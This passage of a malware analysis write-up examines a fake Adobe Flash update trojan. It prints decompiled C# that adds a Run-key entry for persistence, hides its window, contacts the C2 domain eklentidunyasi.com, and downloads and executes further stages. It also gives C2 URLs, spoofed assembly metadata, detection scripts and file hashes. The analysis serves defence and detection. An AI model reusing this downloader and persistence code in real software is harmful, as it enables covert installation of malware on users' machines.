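}

if __name__ == "__main__":
    live = read_hkcu_run()
    for hit in triage_run_entries(live or SAMPLE_RUN):
        print(f"{hit['name']:20} {hit['path']}  <- {hit['reason']}")
```

Run on the infected sandbox it would report exactly the FlashGuncelle and Extension values; on a clean machine it reports whatever per-user software is registered, which is the list to compare against a known-good baseline.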

The following screenshot captures the registry changes in Registry Editor.

Registry

Static analysis

Next, I opened the main malware binary FlashGuncelle.exe (MD5: 30118bec581f80de46445aef79e6cf10) in PEview to find out more about the executable. It was obvious that the malware was written in .NET, very likely in C#. It is compiled with the Visual Studio "Any CPU" target, which lets the same binary run as a native 32-bit or 64-bit process without recompilation: "Any CPU" leaves it to the JIT (Just-In-Time) compiler to translate the MSIL into native code for whichever platform loads the assembly.

The number of .NET malware binaries in the wild seems to be increasing. Writing malware in C# certainly requires significantly less effort than writing the same code in C++ or assembly language.

The only imported function is _CorExeMain (from mscoree.dll), which is typical for .NET executables: the Windows loader calls it to bootstrap the CLR and hand over execution to the managed entry point. The PE header of the binary image is shown below:

PEview

 

The next step was to decompile the main binary FlashGuncelle.exe (MD5: 30118bec581f80de46445aef79e6cf10) and all the other binaries, which also turned out to be written in .NET (presumably C#). What I found was that all the binaries were obfuscated to make reverse engineering harder. Luckily, I managed to identify the obfuscation used and de-obfuscate all the executables. To discourage other bad guys from reusing the concept and the code of this malware, we are not going to publicly disclose the obfuscation method, but we can share this information with well-known AV/security researchers and law enforcement.

Reversing the binaries and analysis of the C# code

Now that we know this is malware and have seen what it does, it makes sense to decompile the code so that we have a clear picture of how the malware was implemented.

All the binaries (i.e., .NET assemblies) use the same obfuscation except Updater.exe, which the malware author chose not to obfuscate at all.

I have also renamed some of the classes after de-obfuscation to make the code more readable.

FlashGuncelle.exe (MD5: 30118bec581f80de46445aef79e6cf10)

This is a Windows Forms .NET application that implements the core downloader logic and a few other tasks.

In the main form of this application, in the FormLoad event, the malware first registers itself as a run-at-startup application. It looks like the malware author either did not have much experience with C# or had recently moved over from C++: the @ prefix makes a C# string literal verbatim, so backslash escapes are not processed and the string actually passed to OpenSubKey is SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run, with doubled backslashes. It is also strange that the buggy call to OpenSubKey is immediately followed by a correct one.

In the same FormLoad event, the application checks whether it is running as the original FlashGuncelle.exe or as its copy FlashUpdate.exe. When running as the copy, it hides its window (invisible, zero opacity, not shown in the taskbar) so the user does not notice it, and it starts YokExe.exe straight away if the SExtension directory already exists. This path is meant to run after the original FlashGuncelle.exe has exited or the user has rebooted, since the copy is what the Run key launches.

using System;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Reflection;
using System.Windows.Forms;
using Microsoft.Win32;

namespace WindowsFormsApplication5
{
    // Decompiled and de-obfuscated; some names were changed for readability.
    // label1 (the progress caption), SaveLibrary, Completed and ProgressChanged
    // live elsewhere in the assembly and are not reproduced here.
    public sealed class Form1 : Form
    {
        // The assembly file version selects which control file the C2 serves.
        public static string fileVersion = FileVersionInfo.GetVersionInfo(Assembly.GetExecutingAssembly().Location).FileVersion;
        public static string checkUrl = ("http://eklentidunyasi.com/extFiles/control" + fileVersion + ".txt");
        public static string copyName = "FlashUpdate";   // name of the persistent copy
        public static string exeName = "YokExe.exe";     // hard-coded name of the second stage
        // C# initializes static fields in declaration order, so programDirectory must
        // come before extensionDirectory (the decompiler listed them the other way round).
        public static string programDirectory = (Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData)); // C:\ProgramData
        public static string extensionDirectory = (programDirectory + @"\SExtension");
        public static string projectName = "FlashGuncelle";  // value name under the Run key
        public static string sourcePath = Application.ExecutablePath;
        public static string targetPath = Path.Combine(programDirectory, copyName + ".exe"); // C:\ProgramData\FlashUpdate.exe

        private bool waitingStatus;  // true when running as the hidden copy and YokExe.exe was already started

        private void Form1_Load_1(object sender, EventArgs e)
        {
            // First run as FlashGuncelle.exe: drop the copy and register it at startup.
            if ((Process.GetCurrentProcess().ProcessName != copyName) && !System.IO.File.Exists(targetPath))
            {
                this.SaveLibrary(projectName + ".exe");
                // Bug: with the @ (verbatim) prefix the "\\" are not escapes, so this
                // key path contains doubled backslashes ...
                Registry.CurrentUser.OpenSubKey(@"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true)
                                    .SetValue(projectName, "\"" + targetPath + "\"");
                // ... and this is the correct call that does the actual work.
                Registry.CurrentUser.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", true)
                                     .SetValue(projectName, "\"" + targetPath + "\"");
            }
            // Running as the copy FlashUpdate.exe (e.g. at logon via the Run key).
            if (Process.GetCurrentProcess().ProcessName == copyName)
            {
                Registry.CurrentUser.OpenSubKey(@"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true)
                                    .SetValue(projectName, "\"" + targetPath + "\"");
                Registry.CurrentUser.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", true)
                                    .SetValue(projectName, "\"" + targetPath + "\"");
                if (Directory.Exists(extensionDirectory))
                {
                    // Second stage already installed: just launch it.
                    Process.Start(programDirectory + "\\" + exeName);
                    this.waitingStatus = true;
                }
                else
                {
                    this.waitingStatus = false;  // fall through to the download below
                }
                // Hide the window so the user does not notice the process.
                base.Visible = false;
                base.Opacity = 0.0;
                base.ShowInTaskbar = false;
            }
            if (!this.waitingStatus)
            {
                // "Please wait, updating!" (ASCII-mangled Turkish)
                this.label1.Text = "Luctfen bekleyin, gucncelleme yapılıyor!";
                WebClient client = new WebClient();
                client.Headers["User-Agent"] = "WebClient For Extensions";
                // Stage 1: fetch this version's control file; its body is the URL of stage 2.
                string uriString = client.DownloadString(new Uri(checkUrl));
                if (uriString.IndexOf(".exe") != -1)
                {
                    client.DownloadFileCompleted += new AsyncCompletedEventHandler(this.Completed);
                    client.DownloadProgressChanged += new DownloadProgressChangedEventHandler(this.ProgressChanged);
                    client.Headers["User-Agent"] = "WebClient For Extensions";
                    // Stage 2: download YokExe.exe into C:\ProgramData; it is launched
                    // once the download completes (handler not shown).
                    client.DownloadFileAsync(new Uri(uriString), programDirectory + "\\" + exeName);
                }
                else
                {
                    MessageBox.Show("PROBLEM!");
                }
            }
        }
    }
}

As the snippet above shows, the malware first sends a GET request to eklentidunyasi[dot]com at hxxp://eklentidunyasi.com/extFiles/control<fileVersion>.txt, where fileVersion is the assembly file version of FlashGuncelle.exe/FlashUpdate.exe. That lets the attacker tailor the response to the version of the client making the initial request. The AssemblyInfo.cs of the same project shows which version we have been testing with.

Also, the User-Agent of the HTTP request is set to the fixed string "WebClient For Extensions". Very likely the server checks the user agent as a crude way of verifying that the request actually comes from the malware client; for defenders, the same string is a cheap network indicator.

using System.Configuration.Assemblies;

// All descriptive attributes are spoofed as "Adobe" so that the file
// properties in Explorer look like a legitimate Flash component.
[assembly: System.Reflection.AssemblyFileVersion("8")]   // selects control8.txt on the C2
[assembly: System.Reflection.AssemblyConfiguration("")]
[assembly: System.Reflection.AssemblyTitle("Adobe")]
[assembly: System.Reflection.AssemblyTrademark("Adobe")]
[assembly: System.Reflection.AssemblyProduct("Adobe")]
[assembly: System.Reflection.AssemblyCompany("Adobe")]
[assembly: System.Reflection.AssemblyCopyright("Adobe")]

In the code segment above, we can see that the version of this assembly is “8”, so in this case the GET request URL sent to the C2 server should look like hxxp://eklentidunyasi.com/extFiles/control8.txt. This mechanism allows the attacker to deliver different malware depending on the version of the FlashGuncelle.exe assembly. The same approach is implemented in all the other binaries as well.
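The check-in just described leaves two stable network indicators: the fixed User-Agent string and the `/extFiles/control<version>.txt` URL shape. The following script is an added example, not code from the post or from the malware; it runs a simple detection over a handful of constructed proxy-style log lines (the log format, timestamp/client/method/url/user-agent, is an assumption) and flags requests that match either indicator or the two C2 domains named in the post, extracting the client version from the control URL where present.

```python
"""Flag HTTP requests that match the FlashGuncelle.exe C2 check-in pattern.

Added example (not from the post). Scans constructed, Squid-like proxy log
lines for the indicators the post documents: the "WebClient For Extensions"
User-Agent, the eklentidunyasi.com / agentofex.com domains, and the
/extFiles/control<version>.txt version-check URL. The log layout is an
assumption: timestamp client method url "user-agent".
"""
import re
from dataclasses import dataclass, field
from typing import List, Tuple

C2_DOMAINS = {"eklentidunyasi.com", "agentofex.com"}
C2_USER_AGENT = "WebClient For Extensions"
# Version-check URL from the post; the digits are the client's assembly version.
CHECK_URL_RE = re.compile(r"^https?://eklentidunyasi\.com/extFiles/control(\d+)\.txt$")
# Assumed log layout: timestamp client method url "user-agent"
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')

# Constructed sample log lines (not real traffic). Only the indicator values
# come from the post; hosts other than the C2 domains are placeholders.
SAMPLE_LOG = """\
2014-01-10T11:59:30 10.0.0.5 GET http://www.example.com/index.html "Mozilla/5.0"
2014-01-10T11:59:35 10.0.0.5 GET http://eklentidunyasi.com/extFiles/control8.txt "WebClient For Extensions"
2014-01-10T11:59:59 10.0.0.5 GET http://eklentidunyasi.com/extFiles/NewFile0001.txt "WebClient For Extensions"
2014-01-10T12:05:00 10.0.0.7 GET http://agentofex.com/check "Mozilla/5.0"
2014-01-10T12:06:00 10.0.0.9 GET http://www.example.org/ "WebClient For Extensions"
""".splitlines()


@dataclass
class Alert:
    client: str
    url: str
    reasons: List[str] = field(default_factory=list)
    version: str = ""  # assembly version seen in the control URL, if any


def host_of(url: str) -> str:
    """Extract the lowercased host name from an absolute URL (port stripped)."""
    return url.split("://", 1)[-1].split("/", 1)[0].split(":", 1)[0].lower()


def classify(url: str, user_agent: str) -> Tuple[List[str], str]:
    """Return the list of matched indicators and the control-URL version."""
    reasons = []
    if host_of(url) in C2_DOMAINS:
        reasons.append("c2-domain")
    if user_agent == C2_USER_AGENT:
        reasons.append("c2-user-agent")
    m = CHECK_URL_RE.match(url)
    if m:
        reasons.append("version-check")
    return reasons, (m.group(1) if m else "")


def scan_log(lines: List[str]) -> List[Alert]:
    """Parse each log line and emit an Alert for every line with an indicator."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # malformed line; skip rather than fail the whole scan
        _ts, client, _method, url, ua = m.groups()
        reasons, version = classify(url, ua)
        if reasons:
            alerts.append(Alert(client, url, reasons, version))
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(a.client, a.url, ",".join(a.reasons), a.version or "-")
```

The user agent alone is a weak signal (any .NET `WebClient` user could set it), so the script reports each indicator separately and lets the version-check URL, which is specific to this family, carry the weight; a request matching all three is the check-in the post describes.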

The following screenshots provide details about a live debugging session of FlashGuncelle.exe.

On the following screen, we can see the initial GET request sent to eklentidunyasi[dot]com: hxxp://eklentidunyasi.com/extFiles/control1.txt

Windows 7 32bit (Honeypot) - Folio-2014-01-10-11-59-35

On the next screen, the urlString value “hxxp://eklentidunyasi.com/extFiles/NewFile0001.txt” is the string received from the C2 server as the response to the GET request sent earlier.

Windows 7 32bit (Honeypot) - Folio-2014-01-10-11-59-59

As shown below, the malware then uses the server's response, “hxxp://eklentidunyasi.com/extFiles/NewFile0001.txt”, as the URL of a second GET request that downloads an additional malware file. The file is stored as “C:\ProgramData\YokExe.exe”.

Windows 7 32bit (Honeypot) - Folio-2014-01-10-11-59-59

Below we can see the location where the actual file is stored.

Windows 7 32bit (Honeypot) - Folio-2014-01-10-12-00-59

Next, FlashGuncelle.exe launches YokExe.exe, as shown below.

Windows 7 32bit (Honeypot) - Folio-2014-01-10-12-02-26

\ProgramData\FlashUpdate.exe

This .NET application is a copy of FlashGuncelle.exe and is intended to ensure that the correct version of the YokExe.exe malware is available, downloading it if required and then executing it.

\ProgramData\YokExe.exe (also titled NewMeTrue1)

This assembly is the mother ship of the rogue Adobe Update malware. It embeds a set of .NET binaries as resources and drops them to the \ProgramData\SExtension folder. These are the files dropped by YokExe.exe:

  • Flash_Plugin.exe
  • Updater.exe
  • Ionic.Zip.dll
  • System.Data.SQLite.dll

Here is a snapshot of the main entry point of YokExe.exe, which shows how the embedded files are dropped to the \ProgramData\SExtension folder.

NewMeTrue1

\ProgramData\SExtension\Flash_Plugin.exe

The malware author decided to encapsulate in this binary the functionality for downloading, installing and loading the malicious Chrome and Firefox plugins.

This malicious application also checks which version it needs to run by sending a GET request to the agentofex[dot]com domain, and kicks off the Updater.exe application if a new version needs to be downloaded. The following screen reveals some of the implementation details of the version check.

Flash_Plugin.exe

Flash_Plugin.exe implements two separate C# classes for installing the malicious Firefox and Chrome plugins.

\ProgramData\SExtension\Updater.exe

This binary is the only .NET assembly in the set that is not obfuscated. It is a simple .NET application that looks for a file named FPlay.exe and, if it is not found under the ProgramData\SExtension folder, downloads it from a Web location provided as a command line parameter. The code of this application is very simple, as shown below.

internal class Program
{
    private static void Main(string[] args)
    {
        string path = Environment.GetFolderPath(
                                  Environment.SpecialFolder.CommonApplicationData
                                  ) + @"\SExtension" + @"\FPlay.exe";
        string address = args[0];
        Process[] processesByName = Process.GetProcessesByName("FPlay");
        int index = 0;
        while (true)
        {
            if (index >= processesByName.Length)
            {
                break;
            }
            try
            {
                processesByName[index].Kill();
            }
            catch
            {
            }
            index++;
        }
        WebClient client = new WebClient();
        client.Headers["User-Agent"] = "WebClient For Extensions";
        byte[] buffer = client.DownloadData(address);
        using (FileStream stream = new FileStream(path, FileMode.Create))
        {
            stream.Write(buffer, 0, buffer.Length);
        }
        Process.Start(path);
    }
}
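The drop locations described in this section (FlashUpdate.exe and YokExe.exe under ProgramData, the SExtension folder with Flash_Plugin.exe, Updater.exe, FPlay.exe and the bundled DLLs) and the SHA-256 values listed in the summary below give a responder a concrete host-side check. The script that follows is an added example, not code from the post; it walks a ProgramData-style tree, reports files whose relative path matches one of the documented drop locations, and separately hashes every file against the summary's SHA-256 values. The root directory is a parameter, so it can be pointed at a live host, a mounted image, or the constructed sample tree built by `build_demo_tree` (constructed contents; their hashes are not the real samples').

```python
"""Host-side triage for the FlashGuncelle.exe drop chain.

Added example (not from the post). Walks a ProgramData-style directory and
reports (a) files at the relative paths where the post saw artifacts dropped
and (b) files whose SHA-256 equals one of the values in the post's summary.
Path comparison is case-insensitive, matching Windows semantics.
"""
import fnmatch
import hashlib
import tempfile
from dataclasses import dataclass, field
from pathlib import Path
from typing import Dict, List

# SHA-256 values copied from the post's summary, keyed for reverse lookup.
KNOWN_SHA256: Dict[str, str] = {
    "25f1f571aace143bb1055dcf52f9ce31c29f6c7fbdeb0d8a6c11165ac1fd0f4c": "FlashUpdate.exe",
    "1fb5799e99090a80375de80afe214af7aea2322dcdc79e63fee99bd0c98a00f2": "YokExe.exe",
    "9799e0fd4b2a86259d5108d1bc6ab8df5d9dafca080d757dd48aafba5e812601": "Flash_Plugin.exe",
    "79a57789fcb37115fb690e9efe99de2329a542dc7d084359dec005c3c9ac453a": "Updater.exe",
    "99e13d9d60b094096d5d34a7f15d07a94ab7f3553ad6bd07e12c31dd752525c6": "buflash.xpi",
    "e9b1632c22ea874850918a665ffd72e388638557eb73e903ab4d6a29f8c39884": "bune10.zip",
}

# Drop locations relative to ProgramData, as documented in the post
# (lowercased glob patterns; Windows paths are case-insensitive).
DROP_GLOBS = [
    "flashupdate.exe",
    "yokexe.exe",
    "sextension/flash_plugin.exe",
    "sextension/updater.exe",
    "sextension/fplay.exe",
    "sextension/ionic.zip.dll",
    "sextension/system.data.sqlite.dll",
    "sextension/log_*.txt",
    "sextension/sextension/buflash.xpi",
    "sextension/sextension/bune10.zip",
]


@dataclass
class Finding:
    relpath: str
    sha256: str
    reasons: List[str] = field(default_factory=list)


def sha256_of(path: Path) -> str:
    """Stream-hash a file so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_programdata(root: Path) -> List[Finding]:
    """Report every file under root that matches a drop path or a known hash."""
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        digest = sha256_of(path)
        reasons = []
        if any(fnmatch.fnmatch(rel.lower(), g) for g in DROP_GLOBS):
            reasons.append("known-drop-path")
        if digest in KNOWN_SHA256:
            reasons.append("sha256-match:" + KNOWN_SHA256[digest])
        if reasons:
            findings.append(Finding(rel, digest, reasons))
    return findings


def build_demo_tree(base: Path) -> Path:
    """Construct a sample tree shaped like an infected ProgramData (constructed
    contents only; these bytes are placeholders, not the real binaries)."""
    (base / "SExtension" / "SExtension").mkdir(parents=True)
    (base / "FlashUpdate.exe").write_bytes(b"MZ placeholder, not the real sample")
    (base / "SExtension" / "Updater.exe").write_bytes(b"MZ placeholder 2")
    (base / "SExtension" / "log_1.txt").write_text("placeholder log")
    (base / "unrelated.txt").write_text("benign file")
    return base


def demo() -> List[Finding]:
    """Run the scanner over the constructed tree and return its findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_programdata(build_demo_tree(Path(tmp)))


if __name__ == "__main__":
    for f in demo():
        print(f.relpath, f.sha256[:12], ",".join(f.reasons))
```

A path match without a hash match is the expected result on a host hit by a later build of the same kit (the post notes the version-gated delivery), so the two signals are reported independently: the hash confirms this exact sample, the path pattern catches its siblings.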

We are happy to provide the full report and other details to AV companies and well-known security researchers.

DISCLAIMER: I don’t speak Turkish and all my findings about the Turkish text found in this malware and all related translations to English are purely based on my own research and Google Translate.

Summary

With this particular sample, the C2 servers—at this writing—are still available and fully working.

The hashes of the files related to this sample are copied below.

==================================================
Filename          : FlashUpdate.exe_
MD5               : 40ae8d901102ee3951c241b394eb94e9
SHA1              : 63a6582aa29e5a36d54695086353a67c500a68f9
CRC32             : f6db777a
SHA-256           : 25f1f571aace143bb1055dcf52f9ce31c29f6c7fbdeb0d8a6c11165ac1fd0f4c
Full Path         : E:\ProgramData\FlashUpdate.exe_
Modified Time     : 10/01/2014 3:52:43 PM
Created Time      : 12/01/2014 8:42:00 AM
File Size         : 150,016
File Version      : 1
Product Version   : 1
Identical         : 
Extension         : exe_
File Attributes   : AR
==================================================

==================================================
Filename          : YokExe.exe_
MD5               : 35904af1a3242557510cdc5ff3f44d99
SHA1              : 76dfb7f32d4ff215041d427aaca38b42b0851cee
CRC32             : 85b498c0
SHA-256           : 1fb5799e99090a80375de80afe214af7aea2322dcdc79e63fee99bd0c98a00f2
Full Path         : E:\ProgramData\YokExe.exe_
Modified Time     : 10/01/2014 3:53:48 PM
Created Time      : 12/01/2014 8:42:00 AM
File Size         : 2,333,184
File Version      : 1.0.0.0
Product Version   : 1.0.0.0
Identical         : 
Extension         : exe_
File Attributes   : AR
==================================================

==================================================
Filename          : Flash_Plugin.exe_
MD5               : 971e15cb12229acb7aadf9af252ce2ac
SHA1              : 74ec5100cfe0ff33afb5a511b7d147a19c46b891
CRC32             : cfbc8d9e
SHA-256           : 9799e0fd4b2a86259d5108d1bc6ab8df5d9dafca080d757dd48aafba5e812601
Full Path         : E:\ProgramData\SExtension\Flash_Plugin.exe_
Modified Time     : 10/01/2014 3:53:52 PM
Created Time      : 12/01/2014 8:42:00 AM
File Size         : 32,256
File Version      : 1.0.0.0
Product Version   : 1.0.0.0
Identical         : 
Extension         : exe_
File Attributes   : AR
==================================================

==================================================
Filename          : Ionic.Zip.dll
MD5               : 6ded8fcbf5f1d9e422b327ca51625e24
SHA1              : 8a1140cebc39f6994eef7e8de4627fb7b72a2dd9
CRC32             : a55b8181
SHA-256           : 3b3e541682e48f3fd2872f85a06278da2f3e7877ee956da89b90d732a1eaa0bd
Full Path         : E:\ProgramData\SExtension\Ionic.Zip.dll
Modified Time     : 10/01/2014 3:53:52 PM
Created Time      : 12/01/2014 8:42:00 AM
File Size         : 462,336
File Version      : 1.9.1.8
Product Version   : 1.9.1.8
Identical         : 
Extension         : dll
File Attributes   : AR
==================================================

==================================================
Filename          : log_635249660382077851.txt
MD5               : efc36d20978c90a0e7433fb74fa3b2b3
SHA1              : d4d504e58a0252ae8b0f34d205c5440169fbaba4
CRC32             : b47f1595
SHA-256           : 63b95fb1cab33806bdd44b0c266887325693a3754aec4a8e3cf998380f60b464
Full Path         : E:\ProgramData\SExtension\log_635249660382077851.txt
Modified Time     : 10/01/2014 3:54:10 PM
Created Time      : 12/01/2014 8:42:00 AM
File Size         : 266
File Version      : 
Product Version   : 
Identical         : 
Extension         : txt
File Attributes   : AR
==================================================

==================================================
Filename          : System.Data.SQLite.dll
MD5               : f68240827d1ed7e643da00d9330f63d9
SHA1              : 3795178deb436eae0fd49b0d1d23f9802f0f0ce0
CRC32             : e5c9577f
SHA-256           : 9e3915fab7095ce6be3581035404747ab01a7a3246866ccfa460a5fe76f81550
Full Path         : E:\ProgramData\SExtension\System.Data.SQLite.dll
Modified Time     : 10/01/2014 3:53:52 PM
Created Time      : 12/01/2014 8:42:01 AM
File Size         : 986,624
File Version      : 1.0.83.0
Product Version   : 1.0.83.0
Identical         : 
Extension         : dll
File Attributes   : AR
==================================================

==================================================
Filename          : Updater.exe_
MD5               : 7dd44e689cc82679cc4872fe181241d0
SHA1              : dcef08501fb4c2e5ec157303944aa1b1582f690c
CRC32             : 45982bb6
SHA-256           : 79a57789fcb37115fb690e9efe99de2329a542dc7d084359dec005c3c9ac453a
Full Path         : E:\ProgramData\SExtension\Updater.exe_
Modified Time     : 10/01/2014 3:53:52 PM
Created Time      : 12/01/2014 8:42:01 AM
File Size         : 6,144
File Version      : 1.0.0.0
Product Version   : 1.0.0.0
Identical         : 
Extension         : exe_
File Attributes   : AR
==================================================

==================================================
Filename          : buflash.xpi
MD5               : 37a4de35280ac95c85a7a14ff45ce322
SHA1              : 552d152d9923a50a853ccb327af718019c98b318
CRC32             : 0f0cefa7
SHA-256           : 99e13d9d60b094096d5d34a7f15d07a94ab7f3553ad6bd07e12c31dd752525c6
Full Path         : E:\ProgramData\SExtension\SExtension\buflash.xpi
Modified Time     : 10/01/2014 3:54:05 PM
Created Time      : 12/01/2014 8:42:01 AM
File Size         : 9,875
File Version      : 
Product Version   : 
Identical         : 
Extension         : xpi
File Attributes   : AR
==================================================

==================================================
Filename          : bune10.zip
MD5               : 576803266e8fce29d021b659d929a8bf
SHA1              : 2615840f3a4a265e8d790793e314bdbde00456d2
CRC32             : 37a43d8d
SHA-256           : e9b1632c22ea874850918a665ffd72e388638557eb73e903ab4d6a29f8c39884
Full Path         : E:\ProgramData\SExtension\SExtension\bune10.zip
Modified Time     : 10/01/2014 3:54:07 PM
Created Time      : 12/01/2014 8:42:01 AM
File Size         : 37,365
File Version      : 
Product Version   : 
Identical         : 
Extension         : zip
File Attributes   : AR
==================================================

==================================================
Filename          : background.js
MD5               : ce540800e3ebc2f246cbdd66eeeacccf
SHA1              : c27db74d28b15d04896974f3f126128c478f92db
CRC32             : a9cb1c8a
SHA-256           : fc54ac80f257c30807b50be768dfb38c123464b916dd839469a99f094e457368
Full Path         : E:\ProgramData\SExtension\SExtension\ext\background.js
Modified Time     : 10/01/2014 5:05:44 AM
Created Time      : 12/01/2014 8:42:01 AM
File Size         : 2,702
File Version      : 
Product Version   : 
Identical         : 
Extension         : js
File Attributes   : AR
==================================================

==================================================
Filename          : extension.js
MD5               : baf958bf8efb09bdaedd46edc200bd2c
SHA1              : f479f885f04c33a467be6d7902b14b736ffe58b7
CRC32             : f82ce877
SHA-256           : fe1c42c2fb21679cdb8dec9ed201bda385f3bc125f7eb63ea1ead49aef7d494d
Full Path         : E:\ProgramData\SExtension\SExtension\ext\extension.js
Modified Time     : 6/01/2014 3:00:18 AM
Created Time      : 12/01/2014 8:42:01 AM
File Size         : 92,546
File Version      : 
Product Version   : 
Identical         : 
Extension         : js
File Attributes   : AR
==================================================

==================================================
Filename          : go.js
MD5               : e6a9d903bb3d18e383ad57a75c76c96f
SHA1              : acc00498f5f132d267c4b2455b3e9033ff3f1123
CRC32             : b6d9c567
SHA-256           : 88ba39cf539229599cc1544f253f0bfd5554b984c162e34595f5fa4e44a1a8e4
Full Path         : E:\ProgramData\SExtension\SExtension\ext\go.js
Modified Time     : 29/12/2013 3:52:34 AM
Created Time      : 12/01/2014 8:42:01 AM
File Size         : 8,994
File Version      : 
Product Version   : 
Identical         : 
Extension         : js
File Attributes   : AR
==================================================

==================================================
Filename          : index.html
MD5               : 95aacd60be37341329a7e9fb9380be0d
SHA1              : 89e3a6f198a2978a75f1dde1c4a5a29e3a9949a7
CRC32             : 5ac53cdb
SHA-256           : 7a3e19067d16d03c18f369ca6239f5ea702d1e79fe7b5ae3a390bbb5afbc3356
Full Path         : E:\ProgramData\SExtension\SExtension\ext\index.html
Modified Time     : 29/12/2013 3:46:38 AM
Created Time      : 12/01/2014 8:42:01 AM
File Size         : 157
File Version      : 
Product Version   : 
Identical         : 
Extension         : html
File Attributes   : AR
==================================================

==================================================
Filename          : manifest.json
MD5               : 11344191ba5f3eed6c1b0d016248e90a
SHA1              : 8d39148233d5115c35bf856080f00b8f123acdf0
CRC32             : c44a9fb1
SHA-256           : bcdb6fb80237b54245943766048bc79ea218a0b06ac585d8ce80ebf34c8b9fbf
Full Path         : E:\ProgramData\SExtension\SExtension\ext\manifest.json
Modified Time     : 30/11/2013 2:43:12 AM
Created Time      : 12/01/2014 8:42:01 AM
File Size         : 665
File Version      : 
Product Version   : 
Identical         : 
Extension         : json
File Attributes   : AR
==================================================